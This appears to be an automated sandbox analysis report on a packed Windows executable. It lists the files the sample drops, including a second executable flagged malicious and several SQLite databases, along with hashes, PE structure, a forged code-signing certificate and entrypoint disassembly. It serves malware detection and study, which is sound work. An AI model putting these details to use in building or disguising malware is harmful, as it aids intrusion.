                                                                                                                                                                            SHA-512:0521ED245FA8F46DE9502CD53F5A50B01B4E83983CC6D9DE0CF02E54D2825C1C26A748CC27E24633DA1171CE0309323235ECF7EB536D4058214D7618794CF2FA
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: PWCCAWLGRESZQJYMKOMIHTZVFVPFCSAZVTKGMPWIGSDMTLFZQLHJERDPYZCJGFCRLISWNBAMIMDXCWDVGVLWLRBEVYOOPHYWACKPZXSURGSIFWTFUJKLSAQNAJEWDLUIKFHXLUAMUDGRAVFMICAHEZBIIEGWGAVVJHMHSIBGNLEHYVSOKQMYABDYCPEBOGBMYUCIGVRGYYQRAYNYHAIBMHOTRIZLLYBECMXTCFUOVXXHSEMIUWSBDHOZIZZUXFTLKXXNEMXBKLCQDPKVZNOMDYUYJRWCVILZVJDNNBMPTNOFSKRQTILJRXTKDNUIYSQCAOPCQKTXYXPPGZDZOQYLGYFPFIWNBSQZXYABPTNBJQNBZEETJSFXZNHXBRWUHOMCZAGZQJLNPMZFALBBPHBIXZHLBTBJLTUHPUYVUDWDFJANSIIDJVMUYLPZPYGAJWMTOHGILQWHKJDQUWMTSWIBVVZGAHCNWIFZNGNERRKMSIVXWXEXRZZEWYASCIYJYCOOBWRTNZELPWKFVZKZIBGQBLGCTSTNAJSWPHYJCQSYZVFRYFSRAVVXJIOHQCNVEOIMWPEAVCJLBHRUKDHJWPFMXAKTZVQCOUKYCBZFWBREKKHOHZVNMMJZGWIZEYRAIKTHMJRCWVWKNMJNSZHSDRUZSQOJKCTOSNGKOKEAWUIQNIYHWKIIDHKQIJWCSGRRLEVUTENXSNNVDVYDJTIWYNCAZIEBXMIROLIBTLMGEUOCECFFWLENTJSVHFKQHKAPBXQAJJSUOUSFCBQTHCFYZGSVVAUPLQELRWLXRCZSUSFUBCORCWMJPUNHTEEYODSFGJFTDZLLXMQYMIHIZXOYGABIAWYSBWLAJSCKBWGJBVMMJKBKLUHULJIUHQXIXESAUTNVVZNKMIVIOHPPQAWTQSEHTQMIWNPRZRETXZHRGWOTGIEHCCSGIUCKCIFCQPTAJOFCIMYSMCOPGASEEYCNQLXCNRAPQUSQXTWPKPYCQXPE
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpBE67.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                            Entropy (8bit):4.702247102869977
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
                                                                                                                                                                            MD5:B734D7226D90E4FD8228EE89C7DD26DA
                                                                                                                                                                            SHA1:EDA7F371036A56A0DE687FF97B01F355C5060846
                                                                                                                                                                            SHA-256:ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
                                                                                                                                                                            SHA-512:D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpBE68.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):1026
                                                                                                                                                                            Entropy (8bit):4.6980379859154695
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:A1cICRRGh4wXAyCbnhdKjiaeD+ICv1Ka42P:0cIYRGh4wXyny+VEV42P
                                                                                                                                                                            MD5:4E3F4BE1B97FA984F75F11D95B1C2602
                                                                                                                                                                            SHA1:C34EB2BF97AB4B0032A4BB92B9579B00514DC211
                                                                                                                                                                            SHA-256:59176791FFEBB86CD28FF283F163F0A44BEC33273968AADFF3852F383F07D1E1
                                                                                                                                                                            SHA-512:DD9C44C85AF10ED76900A2FE9289D28D99FB56CBE5385A46E485BE0F97A3EA7B119FE3235F334D84FA15902EA78F43C334424240B834D272849356421A33B207
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: QNCYCDFIJJXXFOBBXUZWOFUQSSNNMFYIDILWLHTAZLHLJONMCDCVNCVXWBMUFJZAFKEEPNXZDYZJCSPOAMORBEETMACWAZGGTOXJCHTDTMVBHRPTLBCYZORACSZOXJZRVMZHVEOODGKJRRYLCKUFAYOXVKWJMPRNRNPZEPQZONIUXPPIZMRKSMXAPWYEFYYMMEVAXOVEZSPBEJXENHLIHXQMWJRNUJFILZBVCHZGSXSCZDLUJYAIEMFAKMGZRGVOACZDULPMTHUOBPJBMVYTDCJXFDPUECDSDSUEAFWGDFBMYZQEFBBNQHNIAZWLZMSUFKUWZABFJATHSHQHDIAVRZTRYPZQQLMBOTPFBQKJDTMNKBJAFYFAYVOMBSWHOBUQSYEBLHEDVKQNGPPYYDHQTDNFMKYJBWQRTHICJRWSTTREOOBMYGBUCHFDYMGHVLBDKHYWLYGTEDTHOSIOSXLWGESBKVKNDNLHUVLLUBIQJIAQTVGZHJBFRBPSLHGPZGCZVLETNOSXQRRSQJBXTKDASBHEZXYVHEIZXGANNJHMIMQYHDFNNALGZYXGCPYFPYZSCSPKUMVVWIRDXSMSGEKGZNWWWVXGTXWDKSTXVLHRXFELLCWRSIFVJLOUVSMBXWSHSPQZUHHYPANCFLOAYKMMBXMIXYFORAFUEVNVTQFWGSCJZEOHRNDHLLFYLQFOZXARKDDGYWBOFNOCUJWZALYSUEUOMQHCYTBHPYEDSSAKKDECQAZIWWHOJPIMNYUNNZPDBNECENBWFCTSDYUMRCXDFCNYFVTFUUWRGBGWUGZTYCTBQVNAVSKZCNNOJNXDSQUTVJLYJMHLQJJBPEDZOTOVFCJLUVQVIEYTFNEEDHKMXTEKAIHTQBGOPUGKWWNQTAGBHAUZVKMHWVZTYKYOWJYFEGCIPREWFGAHFXDMSFOAYRDJCTSGYNSDSELZDMIXRNFGOTYBEUKLAOAVMHJKZEBGSCQHGCDZCAAGIVBGWEQA
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEAF7.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):73728
                                                                                                                                                                            Entropy (8bit):1.1874185457069584
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                                                                                                            MD5:72A43D390E478BA9664F03951692D109
                                                                                                                                                                            SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                                                                                                            SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                                                                                                            SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFBD.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFBE.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFBF.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\tmpEFC0.tmp
                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40960
                                                                                                                                                                            Entropy (8bit):0.792852251086831
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                                                                                                            MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                                                                                                            SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                                                                                                            SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                                                                                                            SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\325.exe
                                                                                                                                                                            Process:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):979968
                                                                                                                                                                            Entropy (8bit):7.361382512565047
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12288:cGRXJBEsyGeV5qLHKK1QK1MuSUqMidk++KANTbCPpUlmLXIRE:T9JB8rWHKK131MuadkJK4qrXIW
                                                                                                                                                                            MD5:523AC177BFB4FB64A20B60FC0CE3E0E3
                                                                                                                                                                            SHA1:BB965F2D97B19ED01702B8182BBD870670A1E75B
                                                                                                                                                                            SHA-256:20E702B077D7CF9780192671268C321BB0A76BAEC0A731413A1F04F735EEDCE3
                                                                                                                                                                            SHA-512:BD6C23385D7B914AD9A423D71DF9FA33BA917BA696270DF1435D90DE24B7B1286A7263FD10A027C17C41A899E5667F4481C83B385931ECCD244AEA7971D519F2
                                                                                                                                                                            Malicious:true
                                                                                                                                                                            Antivirus:
                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 33%
                                                                                                                                                                            Joe Sandbox View:
                                                                                                                                                                            • Filename: Nb2HQZZDIf.exe, Detection: malicious, Browse
                                                                                                                                                                            • Filename: P58w6OezJY.exe, Detection: malicious, Browse
                                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`................."...........@... ...`....@.. ....................................@.................................P@..K.......0....................`....................................................... ............... ..H............text.... ... ...".................. ..`.sdata.. ....`.......&..............@....rsrc...0............(..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            C:\Users\user\AppData\Roaming\field
                                                                                                                                                                            Process:C:\Users\user\Desktop\kS2dqbsDwD.exe
                                                                                                                                                                            File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):116
                                                                                                                                                                            Entropy (8bit):4.529003957966892
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3Qhl/09h/rywOhSllln+wbp:6v/lhPfkCDtmywFghK9hm9Wlln+Yp
                                                                                                                                                                            MD5:EC6AAE2BB7D8781226EA61ADCA8F0586
                                                                                                                                                                            SHA1:D82B3BAD240F263C1B887C7C0CC4C2FF0E86DFE3
                                                                                                                                                                            SHA-256:B02FFFABA9E664FF7840C82B102D6851EC0BB148CEC462CEF40999545309E599
                                                                                                                                                                            SHA-512:AA62A8CD02A03E4F462F76AE6FF2E43849052CE77CCA3A2CCF593F6669425830D0910AFAC3CF2C46DD385454A6FB3B4BD604AE13B9586087D6F22DE644F9DFC7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview: .PNG........IHDR.............%.V.....PLTE....z=.....tRNS.@..f....pHYs..........+......IDAT..c`.......qd.....IEND.B`.

                                                                                                                                                                            Static File Info

                                                                                                                                                                            General

                                                                                                                                                                            File type:MS-DOS executable, MZ for MS-DOS
                                                                                                                                                                            Entropy (8bit):7.218310131625728
                                                                                                                                                                            TrID:
                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 74.95%
                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 12.51%
                                                                                                                                                                            • DOS Executable Generic (2002/1) 12.50%
                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                                                                                                                            File name:kS2dqbsDwD.exe
                                                                                                                                                                            File size:598944
                                                                                                                                                                            MD5:888ab99280a081717ec5c5749266d1bd
                                                                                                                                                                            SHA1:3a071aeadd42c1232ff2878d2adf7f1e4a629180
                                                                                                                                                                            SHA256:e726f2014db779e3605f60499f84676ceb45160c6d092bedfa115f7e09d693e8
                                                                                                                                                                            SHA512:85b78c1489ed6a8fd375380595f3597968d026de0bd0cfe58e26cd4d6590f1d171626c0a8f677cc71d7405e5e647ede4692e615fd63a63597db724da15dc2299
                                                                                                                                                                            SSDEEP:12288:67iuUvUF2JURoyPa5UA5/zfqb3HtwQG99:67iuUv8Paz/2ZwJ99
                                                                                                                                                                            File Content Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d....4.V..........#.................R..........@.......................................... ...@.................................................X............p..4_.......'.................

                                                                                                                                                                            File Icon

                                                                                                                                                                            Icon Hash:d2ae86929a86a2c2

                                                                                                                                                                            Static PE Info

                                                                                                                                                                            General

                                                                                                                                                                            Entrypoint:0x14013c352
                                                                                                                                                                            Entrypoint Section:.MPRESS2
                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA
                                                                                                                                                                            Time Stamp:0x56F734A2 [Sun Mar 27 01:17:22 2016 UTC]
                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                            OS Version Minor:2
                                                                                                                                                                            File Version Major:5
                                                                                                                                                                            File Version Minor:2
                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                            Subsystem Version Minor:2
                                                                                                                                                                            Import Hash:caa5e6a2892587c2324418efee31c648

                                                                                                                                                                            Authenticode Signature

                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                            Signature Issuer:CN=Sectigo RSA Code Signing CA, O=Sectigo Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                            • 5/22/2019 5:00:00 PM 5/23/2023 4:59:59 PM
                                                                                                                                                                            Subject Chain
                                                                                                                                                                            • CN=Sublime HQ Pty Ltd, O=Sublime HQ Pty Ltd, STREET=Suite 102, STREET=377 New South Head Rd, L=Doubte Bay, S=NSW, PostalCode=2028, C=AU
                                                                                                                                                                            Version:3
                                                                                                                                                                            Thumbprint MD5:A32549731E28A0F6BA85C9B2C50FE589
                                                                                                                                                                            Thumbprint SHA-1:834F29A60152CE36EB54AF37CA5F8EC029ECCF01
                                                                                                                                                                            Thumbprint SHA-256:E025B15847B86808B69C605D7FC63A186CBF1D9A4ED5A1971B2FF5F9C6F50DF0
                                                                                                                                                                            Serial:00972FADA2BC13FA55C5D47FEF56AEE0F4

                                                                                                                                                                            Entrypoint Preview

                                                                                                                                                                            Instruction
                                                                                                                                                                            push edi
                                                                                                                                                                            push esi
                                                                                                                                                                            push ebx
                                                                                                                                                                            push ecx
                                                                                                                                                                            push edx
                                                                                                                                                                            inc ecx
                                                                                                                                                                            push eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            lea eax, dword ptr [00000ADEh]
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov esi, dword ptr [eax]
                                                                                                                                                                            dec eax
                                                                                                                                                                            add esi, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            sub eax, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov edi, esi
                                                                                                                                                                            lodsw
                                                                                                                                                                            shl eax, 0Ch
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            push eax
                                                                                                                                                                            lodsd
                                                                                                                                                                            sub ecx, eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            add esi, ecx
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            push edi
                                                                                                                                                                            inc esp
                                                                                                                                                                            mov eax, ecx
                                                                                                                                                                            dec ecx
                                                                                                                                                                            mov al, byte ptr [ecx+edi+06h]
                                                                                                                                                                            mov byte ptr [ecx+esi], al
                                                                                                                                                                            jne 00007F491C93DB07h
                                                                                                                                                                            inc ecx
                                                                                                                                                                            push ecx
                                                                                                                                                                            push ebp
                                                                                                                                                                            sub eax, eax
                                                                                                                                                                            lodsb
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            shr ecx, 04h
                                                                                                                                                                            push ecx
                                                                                                                                                                            and al, 0Fh
                                                                                                                                                                            push eax
                                                                                                                                                                            lodsb
                                                                                                                                                                            mov ecx, eax
                                                                                                                                                                            add cl, byte ptr [esp]
                                                                                                                                                                            push eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ebp, FFFFFD00h
                                                                                                                                                                            dec eax
                                                                                                                                                                            shl ebp, cl
                                                                                                                                                                            pop ecx
                                                                                                                                                                            pop eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            shl eax, 20h
                                                                                                                                                                            dec eax
                                                                                                                                                                            add ecx, eax
                                                                                                                                                                            pop eax
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ebx, esp
                                                                                                                                                                            dec eax
                                                                                                                                                                            lea esp, dword ptr [esp+ebp*2-00000E70h]
                                                                                                                                                                            push eax
                                                                                                                                                                            push ecx
                                                                                                                                                                            dec eax
                                                                                                                                                                            sub ecx, ecx
                                                                                                                                                                            push ecx
                                                                                                                                                                            push ecx
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov ecx, esp
                                                                                                                                                                            push ecx
                                                                                                                                                                            mov dx, word ptr [edi]
                                                                                                                                                                            shl edx, 0Ch
                                                                                                                                                                            push edx
                                                                                                                                                                            push edi
                                                                                                                                                                            dec esp
                                                                                                                                                                            lea ecx, dword ptr [ecx+08h]
                                                                                                                                                                            dec ecx
                                                                                                                                                                            lea ecx, dword ptr [ecx+08h]
                                                                                                                                                                            push esi
                                                                                                                                                                            pop edx
                                                                                                                                                                            dec eax
                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                            call 00007F491C93DBDDh
                                                                                                                                                                            dec eax
                                                                                                                                                                            mov esp, ebx
                                                                                                                                                                            pop ebp
                                                                                                                                                                            inc ecx
                                                                                                                                                                            pop ecx
                                                                                                                                                                            pop esi
                                                                                                                                                                            pop edx
                                                                                                                                                                            sub edx, 00001000h
                                                                                                                                                                            sub ecx, ecx
                                                                                                                                                                            cmp ecx, edx
                                                                                                                                                                            jnc 00007F491C93DB5Ch
                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                            lodsb
                                                                                                                                                                            inc ecx
                                                                                                                                                                            cmp al, FFh
                                                                                                                                                                            jne 00007F491C93DB1Fh
                                                                                                                                                                            mov al, byte ptr [esi]
                                                                                                                                                                            and al, FDh
                                                                                                                                                                            cmp al, 15h
                                                                                                                                                                            jne 00007F491C93DAFDh
                                                                                                                                                                            lodsb
                                                                                                                                                                            inc ecx
                                                                                                                                                                            jmp 00007F491C93DB29h
                                                                                                                                                                            cmp al, 8Dh
                                                                                                                                                                            jne 00007F491C93DB1Fh
                                                                                                                                                                            mov al, byte ptr [esi]
                                                                                                                                                                            and al, C7h

                                                                                                                                                                            Data Directories

                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x13c0000x358.MPRESS2
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x13d0000x2b508.rsrc
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x1070000x5f34.MPRESS1
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x8fc000x27a0.MPRESS1
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x13ce500x28.MPRESS2
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x13c1180xd0.MPRESS2
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                            Sections

                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                            .MPRESS10x10000x13b0000x63400False1.00031240161data7.99951858505IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .MPRESS20x13c0000xe800x1000False0.50732421875data5.63658087631IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                                            .rsrc0x13d0000x2b5080x2b600False0.124651026657data3.38878491057IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                                                                                                            Resources

                                                                                                                                                                            NameRVASizeTypeLanguageCountry
                                                                                                                                                                            RT_ICON0x13d0f00x1ffbPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                            RT_ICON0x13f1140x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                                                                                                                            RT_ICON0x14f9640x94a8dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x158e340x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x1592c40x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x1597540x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x159be40x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                                                                                                                            RT_ICON0x159d340x5488dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x15f1e40x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 252, next used block 1056964608EnglishUnited States
                                                                                                                                                                            RT_ICON0x1634340x25a8dataEnglishUnited States
                                                                                                                                                                            RT_ICON0x165a040x10a8dataEnglishUnited States
